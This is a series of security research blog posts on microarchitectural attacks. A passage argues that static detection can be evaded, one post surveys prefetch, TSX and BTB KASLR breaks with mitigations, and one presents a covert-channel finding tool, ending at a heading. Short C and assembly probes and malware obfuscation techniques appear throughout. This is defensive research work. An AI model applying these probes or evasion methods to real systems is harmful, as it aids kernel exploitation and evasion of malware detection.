The good part is that solid static analysis is able to effectively spot problems and highlight them to a human analyst. Further manual analysis can be performed based on those indicators to identify malignant behavior, investigate suspicious cases or weed out false positives. What makes this approach somewhat challenging is the fact that static analysis is very difficult to do well and impossible to do right, especially when factoring in that attackers actively try to evade static analysis.
The following is to demonstrate what such an evasive action might look like.

 

Microarchitectural & Rice

Rice’s theorem states that all non-trivial semantic properties of programs are undecidable. In short, obfuscation is difficult to deal with. The bad news is that microarchitectural attacks are non-trivial semantic properties and as such, per Rice’s theorem, undecidable. In other words: you could achieve the same result in an infinite number of ways, without anyone being able to pinpoint the “right” way. You will never be able to deduce, from the semantics, all the syntactic representations that produce them.

The example I like to use is this: One could build an interpreter which takes the original program as input. The output of the interpreter would then have the exact same semantics, but a different syntax. Obviously one could then build a new interpreter that processes the first interpreter’s syntax output and so on and so forth. Consequently, we cannot generate a database of syntax representation for a given semantic. The clever reader will already know that microarchitectural attacks do not lend themselves well to emulation or obfuscation for that matter. They often rely on rare syntax elements (rare instructions). Execution time is a very real concern and any obfuscation might change microarchitectural states that are important to the attack. However, this doesn’t mean it’s impossible.

Let’s go through the above list from an attacker’s point of view.

Cache flushing instructions

The clflush instruction can be replaced by eviction code, as demonstrated by Oren et al. [2] as well as Gruss et al. [3]. This relocates the problem from detecting dangerous instructions to detecting dangerous algorithms. It effectively disqualifies the syntactic element clflush as an answer to a semantic question.
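A hedged sketch of what such a replacement looks like; building the eviction set itself is the hard part and is omitted here:

#include <stdint.h>

/* Flush-by-eviction: touch every address in a set that maps to the
   victim's cache set, pushing the victim line out without ever
   executing a flush instruction. */
static void evict(volatile uint8_t **evset, int n)
{
    for (int i = 0; i < n; i++)
        (void)*evset[i];   /* plain loads, nothing for MASScan to flag */
}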

Non-temporal instructions & timers

Timers are indeed the Achilles heel of most microarchitectural attacks. The rdtsc(p) instructions are a telltale sign of such an attack. Unfortunately, though, they are used by benign applications as well. Often these instructions are wrapped in API functions, e.g. the QueryPerformanceCounter API on Microsoft Windows. The problem with such API calls is that they can be imported dynamically in any number of ways. This makes static analysis fairly cumbersome.

Counter Threads

As for counter threads, they too can be implemented in numerous ways. Counting does not have to be monotonically increasing, only deterministically changing. As the CPUs are superscalar, some instructions can be added to the loop at a very low accuracy penalty. And of course, the loop can be camouflaged. This not only obscures the actual nature of a function (e.g. a counter thread), it also takes the detection into potential false positive territory. Finally, some attacks (like attacks on KASLR) can be repeated. This allows a low accuracy timer to be used multiple times, using the law of large numbers to average out the noise. A minimal counter thread is sketched below.
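A minimal sketch, with none of the camouflage an attacker would add:

#include <pthread.h>
#include <stdint.h>

/* A makeshift timer: one thread increments a counter, the attack thread
   reads it as a timestamp. No rdtsc, no API import to flag. */
static volatile uint64_t ticks;

static void *counter_thread(void *arg)
{
    (void)arg;
    for (;;)
        ticks++;   /* only needs to change deterministically */
    return NULL;
}

In practice both threads would be pinned to co-located hyperthreads, since core co-location determines the accuracy of the makeshift timer.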

Fences

Fences are rarely a strict requirement for attacks. They do tend to lower the noise, but an attack can often do without them. For instance, Oren et al. [2] do prime+probe in JavaScript without a fence. Flush+Reload works fairly decently without fencing as well. Also, makeshift fences can in some cases be produced by gaming the reordering. For instance, filling the reorder buffer with dependent instructions before starting a round of the attack will serve well to fence against already pending loads and stores.

Locking instructions

I’m not aware of any substitution for the lock prefix. In this particular case, we indeed have an indicator that is difficult to replace for an attacker. It should be noted that on Microsoft Windows the Interlocked* API functions use the lock prefix and consequently the same problems arise as with the QueryPerformanceCounter API.

Algorithmic constructions

As far as algorithmic constructions are concerned, those can be varied and obfuscated ad nauseam. Therefore, they make for a poor indicator.
For instance, you could perform eviction using a vector, a tree structure or, in fact, any other data structure. Each of them will generate completely different code. Eviction can be triggered by any instruction that uses memory – therefore, any instruction would achieve this. A very old approach has been memset, which comes at a steep performance penalty for the attacker. However, it would likely suffice for spying on keyboards in Gruss et al. [4] . Call qword ptr [address] can touch two cache lines to load the address and one on the stack, as well as the one or two where the instruction itself lies. That is just an example of how ugly eviction can be made. We could argue with a performance penalty in this case. However, we should bear in mind that optimal eviction strategies not only touch uncached memory, but also memory that is already cached – see Gruss et al. [3]!

It gets worse from there: for row hammer I suggested that we do not need to use eviction at all. Instead, we can bring the cache coherency policy into play to cause write-backs into memory, see Fogh [8]. This provides yet another algorithm that would have to be detected to protect against row hammer, and it can of course be implemented in many different ways.

 

Classic malware obfuscation – Anti static analysis methods

 

Copy protections and malware has historically used a number of methods to defeat static analysis.

Self-modifying code

I wrote my first executable packer in 1995. Packers go back further than that, though. Once an executable has been packed, the only code that is available to static analysis is the first stub of the unpacker. Unfortunately, malware authors are aware of this technique and it’s even available for purchase online as part of COTS malware-as-a-service. Also, packers used commercially for copy protection can be used for obfuscation like this.

Malware can of course also decrypt data and save it as an executable on disk or even in memory to avoid static analysis. Techniques such as “Run-PE” are widespread in real world malware.

Another example of self-modifying code is JIT compiling, which is what JavaScript does. In fact, I use the Keystone assembler JIT style for building microarchitectural attacks fairly often, because it gives me a lot more control than I get from the compiler.

Opening hidden browser windows using malicious JavaScript is entirely possible, and Oren et al. [2] demonstrate that prime+probe runs well in JavaScript. It is worth noting that the browser components can be linked into the malware and subsequently do not need to be present on the victim’s computer.

Such ways of hiding code from analysis are already commonplace and no longer qualify as sophistication in malware.

Anti-disassembly and code reuse

Static analysis can be performed either on source code or on disassembly. Commercial providers, however, tend not to share their source code for intellectual property reasons. This leaves only disassembly as a method for analysis. Unfortunately, the x86 platform has variable-length opcodes. This leads to problems locating the starting point of an instruction, and historically this has been used as a means to thwart disassembly. A clflush instruction can easily be hidden from disassembly as part of, say, a mov instruction. The extreme version of this is doing code-reuse attacks such as ROP. Obviously a clflush “gadget” does not have to be part of the shipped malware, but could very well be part of the operating system – clflush (in the simplest form) assembles to 3 bytes, of which the attacker can influence the third by picking the operand, making it reasonable to find a suitable gadget somewhere in the operating system.
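To make the 3-byte point concrete (the encoding is standard; burying it inside another instruction is my illustration):

/* 0F AE 3B is clflush [rbx] (opcode 0F AE, ModRM /7). Hidden in the
   4-byte immediate of a mov, a linear-sweep disassembler that starts
   at the mov never sees a clflush; a jump into the middle of the
   instruction executes it anyway. */
static const unsigned char clflush_gadget[] = { 0x0F, 0xAE, 0x3B };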

 

A peculiar niche case

We have already seen static analysis thwart these kinds of attacks in one special instance: the NaCl sandbox in Chrome. In there, the code is validated during compilation and run in a sandboxed environment to make sure that none of the above tricks are used. Validation will fail if a clflush instruction is generated. Unfortunately, this is not generally applicable. Nevertheless, requiring an intermediate language representation (say LLVM bitcode) when submitting to an app store may assist the authors’ intention, but many of the issues mentioned above, including Rice’s theorem itself, apply to intermediate language representations as well.

 

Conclusion

At this point in time, attackers capable of launching microarchitectural attacks have to be considered ‘advanced’. We must therefore assume that they have ready access to malware obfuscation technology. This technology can effectively thwart classification using static analysis of executables – this is especially true if the “feature set” is small and malleable. A limited feature set further reduces the cost of applying obfuscation for the attacker. The feature set of MASScan is exactly that: small and malleable. Microarchitectural attacks generally have a bit of leeway for modification to blend in with benign code. Consequently, static analysis is unlikely to give defenders a real edge. Static analysis could be augmented with symbolic or even concolic analysis to improve accuracy. However, these methods scale poorly and have issues of their own. Add to this a <6% false positive ratio, and static analysis seems a dull weapon against microarchitectural attacks. This leaves the dynamic approach, which I consider the most promising stop-gap solution.
For instance, my Flush+Flush detection blog post [7] and my work with Herath on detecting row hammer and cache attacks using performance counters at Black Hat 2015 [6] are examples of how detecting microarchitectural attacks can be automated in controlled environments. These methods are not without flaws either, but from an attacker’s point of view they are at least more difficult to work around, as they are often behavior-based and consequently circumvent the problem presented by Rice’s theorem. Despite progress in defense research, we remain without strong defenses against microarchitectural attacks.

 

Literature

[1] Irazoqui, G., Eisenbarth, T., and Sunar, B. MASScan: Stopping Microarchitectural Attacks Before Execution. http://eprint.iacr.org/2016/1196.pdf

[2] Oren, Y., Kemerlis, V. P., Sethumadhavan, S., and Keromytis, A. D. The spy in the sandbox: Practical  cache attacks in javascript and their implications. In Proceedings of the 22Nd ACM SIGSAC Conference on Computer and Communications Security (New York, NY, USA, 2015), CCS ’15, ACM, pp. 1406-1418.

[3] Gruss, D., Maurice, C., and Mangard, S. Rowhammer.js: A remote software-induced fault attack in javascript. In Proceedings of the 13th International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment – Volume 9721 (New York, NY, USA, 2016), DIMVA 2016, Springer-Verlag New York, Inc., pp. 300-321.

[4] Gruss, D., Spreitzer, R., and Mangard, S. Cache template attacks: Automating  attacks  on  inclusive  last level  caches.   In 24th USENIX Security Symposium (2015), USENIX Association, pp. 897-912

[5] Z0mbie, “Opcode Frequency Statistics”. http://z0mbie.daemonlab.org/opcodes.html

[6] Herath, N., Fogh, A. “These Are Not Your Grand Daddy’s CPU Performance Counters”. Black Hat 2015. See also http://dreamsofastone.blogspot.de/2015/08/speaking-at-black-hat.html

[7] Fogh, A. Detecting stealth mode cache attacks: Flush+Flush. http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] Fogh, A. Row hammer, java script and MESI. http://dreamsofastone.blogspot.de/2016/02/row-hammer-java-script-and-mesi.html

Micro architecture attacks on KASLR

 

Introduction

Recently a number of different micro architecture attacks on Kernel Address Space Layout Randomization (KASLR) have been published. The idea behind KASLR is that code reuse attacks and read/write primitives are useless if the attacker is unable to tell where code and data are. Consequently, modern operating systems randomize the virtual addresses where code and data are stored. However, it turns out the CPU leaks information about the address space layout, causing this defense to fail. This blog post briefly summarizes the 4 known micro architecture attacks on KASLR and discusses potential mitigations. Part of the mitigation portion will be speculative. Bias up front: I’m a coauthor of the prefetch attack and quite like it.

What do I mean by a micro architecture KASLR break?

When I wrote my first blog post [8] on breaking KASLR with micro architecture, I was criticized for using the term “micro architecture”. What I mean to convey when I use this term is that there is nothing in the Instruction Set Architecture (ISA) that specifies that the x86 has to work in ways that allow us to attack KASLR. Rather, the features that are being used are part of the implementation of the ISA. This usage of the term seems in line with common usage in the academic literature. There have been attacks on KASLR using page deduplication, e.g. Barresi et al. [1], which some consider a microarchitecture attack. I, however, do not, and will thus not include these attacks in this discussion.

History of micro architecture KASLR breaks

 

Using page faults

Hund, Willems & Holz [9] were the first to publish an attack on KASLR. They use a combination of a classical prime+probe cache attack and a novel attack on the paging caches: the time it takes for a fault to be thrown on unprivileged access to a page on x86-64 differs significantly depending on whether the translation is cached in the paging caches. An attacker can measure this difference. Further, even an unprivileged access to a page causes the translation caches to be loaded, and consequently you can use a timing difference attack to tell if memory is mapped at a certain location. They called this the “double page fault” attack.

Using Prefetch

I wrote a blog post in January [8] that became my starting point for the paper by Gruss et al. [6]. The Hund, Willems & Holz [9] attack suffers from the drawback that the timing is measured across the page fault handler, which adds significant noise. This makes the attack itself slow, and due to the noise the attack needs to be repeated a significant number of times to become reliable. What my coauthors and I noted was that the prefetch instructions do not cause page faults – they terminate silently. They do, however, have the same timing properties, as they do the same look-ups. Consequently, replacing page faults with the prefetch instruction provides a faster and more reliable KASLR break.
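The probe itself is tiny; a hedged sketch in C with the usual intrinsics (calibration and the address scan loop omitted):

#include <stdint.h>
#include <x86intrin.h>

/* Time a software prefetch of a candidate kernel address. The prefetch
   never faults, but its latency reflects how far the page walk got,
   i.e. whether a translation exists at this address. */
static uint64_t prefetch_time(const void *addr)
{
    unsigned aux;
    _mm_mfence();
    uint64_t t0 = __rdtscp(&aux);
    _mm_prefetch((const char *)addr, _MM_HINT_T2);
    uint64_t t1 = __rdtscp(&aux);
    return t1 - t0;
}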

 

Using TSX

Wojtczuk wrote in a blog post [3] that Intel’s TSX technology might make Hund, Willems & Holz’s [9] attack significantly more practical. Jang et al. [2] took this up and showed Wojtczuk [3] was right. TSX works by being able to roll back a set of memory accesses if they cannot be completed immediately due to conflicting accesses in the relevant portions of the memory subsystem – much like transactional access to databases. However, an access to a page that would normally trigger a page fault now just causes a rollback inside a transaction. Consequently, a significant speed-up and reliability gain can be had by wrapping your “probe” in a TSX section.
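Roughly along these lines; a hedged sketch (requires RTM support, compile with -mrtm):

#include <stdint.h>
#include <immintrin.h>
#include <x86intrin.h>

/* Inside a transaction, touching an unmapped kernel page aborts instead
   of faulting; the time until the abort path runs separates mapped from
   unmapped addresses without ever invoking the page fault handler. */
static uint64_t tsx_probe(const void *addr)
{
    unsigned aux;
    uint64_t t0 = __rdtscp(&aux);
    if (_xbegin() == _XBEGIN_STARTED) {
        *(volatile const uint8_t *)addr;   /* aborts on kernel memory */
        _xend();
    }
    return __rdtscp(&aux) - t0;
}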

 

Using Branch Target Buffer

The fourth and fairly different attack came using the Branch Target Buffer, BTB. Evtyushkin, Ponomarev & Abu-Ghazaleh [5] found that Intel caches branch targets in the BTB in order to improve branch prediction. Correctly predicting branches is important to performance, because a mispredicted branch underutilizes the entire instruction pipeline. Intel, however, is cheap with the bits and uses only the lower 31 bits to store a branch target in the cache. Since KASLR is typically built on entropy in the lower 31 bits, and these bits are shared between kernel and user mode, an attacker can cause conflicts. These conflicts will cause measurable timing differences.

 

Features

Despite the first three methods revolving around the same theme, they have significantly different advantages and caveats. The unique BTB method obviously also has diverging properties. I shall stress the advantages and problems of each vector using the Hund, Willems & Holz paper [9] as a baseline. This classical method now appears mostly obsolete. That said, I consider the paper a milestone for many reasons and it’s well worth a read.

The Advantages of the prefetch vector

Using the prefetch instruction is, as noted above, faster and more reliable; it is also more accurate. Without the noise, one can spot a timing difference depending on the level in the page table hierarchy at which a translation was aborted. This allows an attacker to efficiently map out the entire address space top down, starting out with 1 gigabyte regions. Further, the prefetch instruction actually ignores the page table security settings and prefetches an address into a cache. This allows an attacker to recover physical addresses and bypass SMEP & SMAP when the operating system is using a direct mapping. The prefetch instructions are available on all current CPUs, as they were introduced back in 1998.

The TSX vectors’s advantages

Like the prefetch attack, no fault handler is called, and consequently the attack has significantly reduced noise. The TSX attack, unlike prefetch, can trigger code access through execution using a jump or call instruction. This has significantly different timing properties and consequently allows the attacker to distinguish between code and data. As a downside, it cannot use the cache loading properties of the prefetch instruction. A major drawback of the TSX vector is the installed base of TSX, which is somewhat limited. It was officially introduced with the Haswell micro architecture. To this day TSX is only available in high end computers: some i5s, i7s and Xeons. This does not yet include the U series, which is the most popular processor line for notebooks.

BTB

The BTB attack is probably the most limited attack, as it is only able to locate code and data where branches give away the address. For all its limits in this regard it is probably the fastest of the attacks. Further Felix Wilhelm [11] showed that since the attack does not rely on page tables, it translates to host-KASLR breaks too.

Software Mitigation

Intel has in the past not been inclined to do anything about micro architectural attacks, and consequently I have significant doubt that they will with the KASLR attacks. In fact, the segment limits that were part of the x86-32 architecture would be a show stopper for the first three attack vectors, but they were removed for performance with x86-64.

It is often suggested that making the timer (RDTSC(P)) less accurate will mitigate micro architectural attacks, which covers all 4 attack vectors here. The cost is obviously some implementation overhead and a less accurate timer for benign purposes. It could be implemented through the CR4.TSD bit for bare metal operating systems, or by setting up the MSRs to get a VMEXIT in hypervisor environments. These costs seem reasonable to me – I have yet to hear a convincing argument why user mode applications in general need such timing accuracy, and I have never heard a convincing argument that any application would be significantly slowed down by the overhead required to get less accuracy on the RDTSC(P) instruction. That said, a lower timing accuracy is not a good mitigation in cases where an attack can be repeated. The reason is that once an attacker can repeat a timing attack, he can use the law of large numbers to cancel out any noise or bias added to the timer. For KASLR attacks, there is little reason why an attacker cannot repeat the attack, and in fact the Hund, Willems & Holz [9] attack does this to great effect – not because of a noisy timer, but because of the noise added by the page fault handler. I thus think it’s safe to conclude that a noisy timer cannot be a solution to KASLR micro architecture attacks.

The Hund, Willems & Holz [9] attack is fairly easy to mitigate. Since it actually triggers a page fault, one has a nice callback in the page fault handler. A few lines of code can use the client CS and error code on the stack and the linear address in CR2 to check if a user mode program tried to access kernel memory, and respond accordingly. As this event should be really rare, the response can be anything from adding a large delay, making the attack impractical, to shutting down the application.
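Those few lines might look like this; every identifier below is hypothetical and OS-specific, so read it as pseudocode in C syntax:

#include <stdint.h>

/* Hypothetical hook early in the page fault handler: a user mode CS
   combined with a kernel space fault address should practically never
   happen legitimately, so delay or kill the offender. */
void on_page_fault(uint64_t error_code, uint64_t client_cs)
{
    uint64_t linear = read_cr2();   /* faulting linear address */
    if (is_user_cs(client_cs) && linear >= KERNEL_SPACE_START)
        punish_current_process();   /* long delay or terminate */
    /* ... normal page fault handling ... */
}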

 

The Jang et al. [2] version of the TSX attack, DrK, uses page mapping (the number of continuously mapped pages) and page attributes to identify modules. This can easily be thwarted by mapping unused pages in the driver region to a single PFN with only null data. The cost shouldn’t be too bad, as only one PFN needs to be referenced from a number of PTEs, which to some extent can reuse existing PDEs. Exactly how many additional PDEs would be needed to thwart DrK would be a tuning parameter. This method would also slow down the prefetch attack; however, it currently uses a function call to load the caches and thus cannot be completely thwarted in this fashion. It is likely that the TSX vector could be made to work in a similar fashion.

Both the TSX vector and the BTB vector are vulnerable to performance counter detection, as there are currently performance counters that map to micro events caused by the attacks. Say, for instance, the detection I suggested for the Flush+Flush [7] attack could easily be modified to detect both these attacks. The prefetch attack, however, does not seem to have a performance counter event that correlates sufficiently with the attack. The performance counters on software prefetches were discontinued and remapped with the by now very old Silvermont generation of processors. These kinds of detections are unfortunately either high-overhead or false positive prone. Consequently, they do not offer themselves as general solutions, but are rather of a close-the-gap nature. Without a good performance counter mapping to the prefetch instruction, reliable detection would likely be prohibitively expensive performance-wise using these methods.

The BTB and TSX vectors offer other ways of detection. In particular, it seems likely that both will generate activity in the Last Branch Record (LBR) stack. If one were to instrument the RDTSC(P) instruction, as suggested above, the distance between the last RDTSC(P) instruction and the current one, combined with the LBR, would provide clues to nefarious activity, quite possibly at a fairly low cost.

More promising is a BTB-only trick that relies on the very thing that makes the BTB attack work in the first place. The BTB vector works because only the lower bits are used to store the branch target, and thus you get conflicts between kernel and user mode branches. Interestingly, this conflict consequently only gives you information on the lower 31 bits, and Evtyushkin and Ponomarev [5] note that using the upper bits for KASLR thus remains a solution. Using all the remaining addressing bits for KASLR seems a good idea; however, all modern operating systems sort different types of code and data into blocks and partially use these blocks to identify malignant behavior. For instance, drivers in Windows are loaded between 0xFFFFF800`00000000 and 0xFFFFF8FF`FFFFFFFF. Thus, to minimize changes to this general structure, using only the upper 9 bits (the PML4 bits) would probably be the easiest solution. This would give you 256 different locations which the BTB method could not tell apart (the topmost bit is used to distinguish between kernel mode and user mode). Not much, but an attacker is unlikely to get away with crashing a machine a 100 times to get it right by random chance. In fact, Windows 10 Anniversary Edition does this for PTEs, but not for code. See Economou [10] for more info.

The three vectors based on actually accessing kernel memory can be mitigated through address space separation. By treating kernel mode as a separate “process” and swapping the CR3 register immediately after/before a ring change, one can effectively block these attacks. Depending on the amount of ring switching going on, an operating system is looking at about 5% overhead, as swapping the CR3 register is expensive in and of itself and because it invalidates the paging caches. Both Jang et al. [2] and Gruss et al. [6] mention this method.

A mitigation that I considered for thwarting the BTB attack was flushing the BTB itself by systematically doing a number of jmp instructions when switching back into user mode. This method is likely to have too much performance overhead to be practical. The reason is the size of the BTB, which Godbolt [4] estimates at 2048 entries on his Haswell – thus requiring 2048 dummy branch instructions on every transition into user mode.

Conclusion

The natural question of which of these methods is the best is a misunderstood question. While the first method appears obsolete by now, the other 3 methods have different advantages and disadvantages. They base themselves on at least 2, but probably 3, different side channels in the CPU, and thwarting all four attacks seems like a difficult undertaking. Personally, I find it likely that there are more leaks in the processor to be found – maybe I’ll write about that another time. The natural conclusion is that KASLR for bare metal operating systems seems to be broken for defending against privilege escalation mounted from native code. The caveat here is the “from native code” part. Classical data-based attacks, such as the font attacks of the past, cannot be doctored to break KASLR using these micro architectural attacks. Before I cry any crocodile tears, I should note that KASLR was always a stop-gap solution, and consequently mitigations become mitigations for a mitigation. The real problem is bugs in kernel mode – and though it is very difficult to fix all kernel mode bugs, minimizing code in the kernel and improving kernel mode code quality must remain the focus of making the kernel secure.

 

Literature

[1] A. Barresi, K. Razavi, M. Payer, T. Gross: “CAIN: Silently Breaking ASLR in the Cloud” – https://nebelwelt.net/publications/files/15WOOT.pdf

[2] Y Jang, S Lee, T Kim , “Breaking Kernel Address Space Layout Randomization with Intel TSX”

– Proceedings of the 23rd ACM Conference on  Computer and Communications Security

[3] R Wojtczuk.” TSX Improves Timing Attacks Against KASLR.” https://labs.bromium.com/2014/10/

[4] M Godbolt. “The BTB in contemporary Intel chips.” http://xania.org/201602/bpu-part-three

[5] Evtyushkin, D., Ponomarev, D., Abu-Ghazaleh, N. Jump Over ASLR: Attacking Branch Predictors to Bypass ASLR. In Proceedings of the 49th International Symposium on Microarchitecture (MICRO) 2016.

[6] D Gruss, C Maurice, A Fogh, M Lipp, S Mangard . “Prefetch Side-Channel Attacks: Bypassing SMAP and Kernel ASLR.” Proceedings of the 23rd ACM Conference on Computer and Communications security 2016

[7] A Fogh. “Detecting stealth mode cache attacks: Flush+Flush. http://dreamsofastone.blogspot.de/2015/11/detecting-stealth-mode-cache-attacks.html

[8] A Fogh: “Breaking KASRL with micro architecture Part 1”, http://dreamsofastone.blogspot.de/2016/02/breaking-kasrl-with-micro-architecture.html

[9] R Hund, C Willems, T Holz. “Practical timing side channel attacks against kernel space ASLR.” Security and Privacy (SP), 2013 IEEE Symposium on, 191-205

[10] N Economou.  “Getting Physical: Extreme abuse of Intel based Paging Systems” -https://blog.coresecurity.com/2016/08/25/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-3-windows-hals-heap/

[11]  F Wilhelm “mario_baslr” https://github.com/felixwilhelm/mario_baslr/

Covert Shotgun

Automatically finding SMT covert channels

Introduction

In my last blog post I found two covert channels in my Broadwell CPU. This blog post will again be about covert channels. For those unfamiliar: a covert channel is a side channel where the attacker has an implant in the victim context and uses this channel to “smuggle information” in and out of the victim context across existing security boundaries.

In this blog post I’ll explore how we can automate finding SMT covert channels. SMT is the technical term for what Intel brands hyper threading.

Before I proceed, I should note that one of the two covert channels I found in my last blog post, the one based on the RdSeed instruction, appears to have been found by others as well. You can read about it in D. Evtyushkin & D. Ponomarev [1]. They will be presenting their work on this channel at CCS. Unlike myself, they develop the channel fully and discuss mitigations. So if you find this channel interesting, their paper is well worth a read.

 

SMT and side channels

For a long time, I’ve wanted to look for side channels in SMT. SMT is the technical name for hyper threading. Back in the Pentium 4 days, Intel figured that most subsystems in a CPU core are used relatively seldom, so they had the idea that you could run two hardware threads in the same core if you duplicate only the most important subsystems of the core. The remaining subsystems would be shared between the two hardware threads. In the event that the two threads simultaneously want to use a shared subsystem, one would just have to wait. In short, you gain a significant amount of performance for a little bit of infrastructure. The problem is, if you read what I just wrote sideways, it has “side channel” stamped all over it. In fact, a number of side channels related to SMT have been found in the past: for instance Acıiçmez and J.-P. Seifert [2], D’Antoine [3], and the neat little SMT side channel in the pause instruction from my last blog post – just to mention a few.

 

Covert Shotgun

The pause side channel I found by reading the Intel optimization manual. This is the kind of work one usually does to find these critters – sort of like a sniper looking for targets. But I figured it might be possible to automate the process – more like firing a shotgun and hoping you hit something. Hence my tool for doing so is called Covert Shotgun.

The basic idea is this: you have 3 instructions, one whose latency you measure and two which you use to send a signal. The instruction whose latency I measure I call the receiver instruction. Of the two signal instructions, one should use a subsystem that is also used by the receiver instruction, whereas the other should not. The receiver instruction’s latency will tend to be smaller when no subsystem is shared, and we can encode this smaller latency as a 0-bit. To automate the process, shotgun picks 3 instructions from a list of interesting instructions and measures the latency of the receiver instruction while running each of the two signal instructions on the co-located hardware thread.

 

To implement this, I use the Keystone assembler engine to generate receiver and signal code. The signal code is optimized to maximize pressure on any subsystem used by the signal instruction:

A:                          ; signal loop running on the other hardware thread
<signal_instruction>
<signal_instruction>
<signal_instruction>
<signal_instruction>
<signal_instruction>
jmp A

I repeat the instruction 5 times to minimize the effect of the jmp instruction. The receiver instruction’s latency is measured like this:

cpuid                       ; serialize the instruction stream
mfence                      ; order outstanding memory accesses
rdtscp                      ; start time stamp
mov rdi, rax
<receiver instruction>
rdtscp                      ; end time stamp
sub rax, rdi                ; latency in rax
ret

With a list of instructions, I can pick a receiver instruction and two signal instructions and test the receiver with both signals. If there is a significant difference, I have a manifestation of a covert channel. Covert Shotgun uses plain brute force on the list, which makes it really slow and stupid (on the order of N³ tests) – but for small lists it works well enough.

As for what makes a significant difference, my initial idea was to do a classic significance test on 1,000,000 timing samples to determine if there was statistical evidence of a channel. This turned up side channels that probably really do exist, but would be thoroughly impractical due to noise. The modified check is an average timing difference of at least 1 clock cycle or 1 standard deviation, whichever is larger, where I estimate the standard deviation as the square root of the sum of the sample variances of the two signals. This should ensure that the channel is practical. I acknowledge that the standard deviation estimator isn’t BLUE, but given the ad hoc nature of the practicality measure that is not an issue.
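In formula form, a combination counts as a practical manifestation when

$$|\bar{t}_1 - \bar{t}_0| \geq \max\!\left(1\ \text{CLK},\ \sqrt{s_1^2 + s_0^2}\right)$$

where $\bar{t}_i$ and $s_i^2$ are the sample mean and sample variance of the receiver latency under the two signal instructions.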

Now, the smart reader will have noticed I used the wording “manifestation of a covert channel”. I generally tend to only count something as a separate side channel if the subsystem where the contention is caused is unique. With this method we are likely to find several manifestations of the same side channel. However, it’s worth noting that different manifestations might have different properties, and consequently any manifestation could turn out to be useful. For example, flush+reload and flush+flush would under this definition be the same side channel, but Flush+Flush is faster and more stealthy than flush+reload. See my previous blog post on cache side channel attacks [4] and Gruss et al. [5] on flush+flush.

Also worth noting is that Covert Shotgun will only find side channels of the instruction timing type, and only when the instruction parameters are inconsequential. Finding a side channel like flush+reload or even flush+flush is not possible in this fashion.

Strictly speaking, Covert Shotgun can find covert channels cross core. The reality of it is that cross core covert channels of the instruction timing type are rare. I’ve only found the RdSeed channel so far.

The hardware

[Figure: simplified diagram of the instruction execution logic in a Broadwell core]

A priori I expect a significant number of covert channels. To understand my a priori expectation, let’s spend a second reviewing some hardware design. The diagram is a very simplified “map” of the instruction execution logic in my Broadwell Intel CPU. I’ve simplified it by removing the memory subsystems, as Covert Shotgun currently cannot be used to analyze that subsystem. Further, I’ve left the registers out for simplicity; they are not important for Covert Shotgun, to the extent that registers are duplicated for the two threads.

The first step in execution is decoding instructions into µops. There is a cache for µops which could probably be used for cache side channels – if I recall correctly, I saw a paper on it. Covert Shotgun currently only uses a handful of instructions at a time and thus is unlikely to find side channels in this cache. The cache is nevertheless particularly interesting, as it would give information on which instructions are in it.

Once decoded, the µops are reordered to maximize parallel execution.

The reordered µops then enter a queue for the ports. Intel speak for this queue is the unified reservation station, or sometimes just reservation station. The Intel architecture connects individual execution units through these ports.

Each port is capable of handling only one µop per cycle, meaning that it’s fairly easy to run into congestion in the ports. Each of the 8 ports is connected to up to 7 individual execution units, which each execute particular specialized tasks. Some execution units are duplicated and available on multiple ports; some are available on only one port – this very well reflects that the CPU was designed for hyper threading. This would lead us to expect a high number of manifestations where the receiver instruction and the 1-bit sender instruction are identical – with reordering and multiple execution units making sure that it occurs less than 100% of the time. For 0-bit instructions we’d expect a speedup when running in parallel with themselves. The main point of congestion is probably in the individual execution units – especially those that are not duplicated.

Until Haswell, Intel had 6 ports; Haswell added an additional 2 ports, going to a total of 8. This allows further parallelization of execution. I think Skylake added even more ports and duplicated an integer execution unit for better parallelization of integer and vector instructions, but I’m not sure. More parallelization typically means fewer covert channels. These changes should serve as a reminder that the covert channels you find on, say, a Broadwell need not exist on a Sandy Bridge and vice versa, even when the instructions exist on both. The microarchitecture is subject to change, and these changes have significant effects on covert channels and other micro architectural attacks.

Results

Due to the O(N³) nature of Covert Shotgun, I ran a small list of 12 instructions, where some were picked because I suspected covert channels in relation to them, and some were chosen because I found them particularly likely to be boring. The list of instructions:

Instruction – My reasoning

RdSeed rax – Pretty slow, thus likely a “0” signal instruction
Pause – The most likely “0” signal instruction
Nop – Does it get any more benign?
Xor eax,eax – I used it in my last blog post
Lea rax,[4*rax+rdi+40960]; lea rdx,[8*rax+rdi+409623] – I suspected I might get into trouble with the address generation unit by using SIB bytes, two instructions and a constant bigger than 2048
RdRand rax – Sounded interesting
Add rax,1; Bts rax,1; Bt rax,1 – Wanted to check near-identical instructions against each other
Cpuid – An interesting instruction on any day
Movq xmm1, xmm2 – Streaming instructions must be tested
Vtestps ymm1, ymm2 – More streaming instructions… this time 256-bit wide

 

Running these 12 instructions in brute force meant testing for 936 covert channels. Among these I found 521 practical covert channel manifestations. That’s a whopping 55%. Now, I expected there to be a lot of manifestations in there, but this magnitude surprised me. Personally, I don’t think the detailed results are that interesting. The thing is, I think SMT in and of itself should be considered the side channel here, as opposed to considering congestion in the subsystems below the SMT as the core reason. However, I will give you a summary of a few interesting finds below.

[Figure: matrix of Covert Shotgun timing results for the 12 tested instructions]

RdSeed turned out to be an extraordinarily good “0” signal instruction: all instructions run faster in parallel with it than with other instructions. No less than 46 of the covert channel manifestations were with RdSeed. With RdSeed taking around 300 CLKs to finish, it is likely that this instruction to a very large extent does not interfere with the execution of other instructions, leaving every shared resource mostly free for maximum speed. The pause instruction has the same effect, but not quite as strongly, and not quite as surprisingly (part of the reason for the pause instruction is to yield to the other hardware thread). Most likely this is because the pause instruction has significantly lower latency on my computer and thus more overhead than RdSeed. If I recall correctly, the pause instruction pauses significantly longer on Skylake. Interestingly enough, the RdSeed instruction also has a significant speedup effect on itself. In my estimation it’s a larger speedup than can be explained within the pipeline, and the most likely reason is that the “seeding unit” is busy and the instruction thus terminates early.

Most of the 1-bit signal instructions seem to have a higher latency when paired with themselves than with the average instruction in my test. With the limited number of instructions and the serious selection bias involved, I advise against drawing any conclusion.

Unfortunately, I messed up the "lea" test in that I had a dependency between the two lea's, and consequently I needed to rerun the test. Rerunning the test with lea's without dependencies did not appear to change the results significantly.

Future research

